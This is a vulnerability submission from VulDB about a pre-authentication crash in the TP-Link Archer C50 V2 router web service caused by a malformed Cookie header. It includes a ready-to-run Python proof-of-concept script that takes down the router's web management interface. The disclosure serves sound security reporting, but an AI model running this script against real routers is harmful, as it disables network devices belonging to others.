| Título | Web crash found on TP-LINK router(Archer C50(US)_V2_160801) |
|---|
| Descripción | # Web crash found on TP-LINK router(Archer C50(US)_V2_160801)
## Overview of the Vulnerability
This vulnerability exists in the router version of TPLINK Archer C50v2(Firmware version:Archer C50(US)_V2_160801,downloadlink:https://www.tp-link.com/us/support/download/archer-c50/v2/#Firmware). The corresponding vulnerability happen at parsing cookie field of http request packet. The router goes crash after parsing a malformed cookie. Obviously the vulnerability happens before authentication, so it's easy to attack the router without knowing password of the web service. Only just one malformed request can disable the router function well and have potential to control over the router.
## Business Impact
The implementation of the vulnerablity is very simple and can result in indirect financial loss for the business. These malicious acts may also cause damage to the business reputation by affecting the trust of customers.
## Steps to Reproduce
I have attached the reproduced Poc code below. You only need to modify the web IP address of the target device to exploit the vulnerability and crash the program.
## Proof of Concept (POC)
After executing the POC script, then trying to visit the router web management interface(or 'telnet device_web_ip 80'), you will find web service goes down.
```python
import requests
import time
device_web_ip = '192.168.0.1'
request = {'HEAD' :
{'Host' : '{}'.format(device_web_ip),
'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
'Accept-Language': 'en-US,en;q=0.5',
'Accept-Encoding': 'gzip, deflate',
'Connection': 'close',
'Cookie' : 'Authorization',
'Upgrade-Insecure-Requests' : '1',
'Cache-Control' : 'max-age=0'
},
'ATTR':
{'URL': 'http://{}/'.format(device_web_ip),
'METHOD': 'GET',
'VERSION': 'HTTP/1.1'
}
}
headers = request['HEAD']
method = request['ATTR']['METHOD']
url = request['ATTR']['URL']
try:
r = requests.request(method=method,url=url,headers=headers,verify=False,timeout=0.5)
except:
pass
```
|
|---|
| Usuario | a2ure (UID 41072) |
|---|
| Sumisión | 2023-02-16 08:22 (hace 3 años) |
|---|
| Moderación | 2023-02-21 10:23 (5 days later) |
|---|
| Estado | Aceptado |
|---|
| Entrada de VulDB | 221552 [TP-Link Archer C50 V2_160801 Web Management Interface denegación de servicio] |
|---|
| Puntos | 17 |
|---|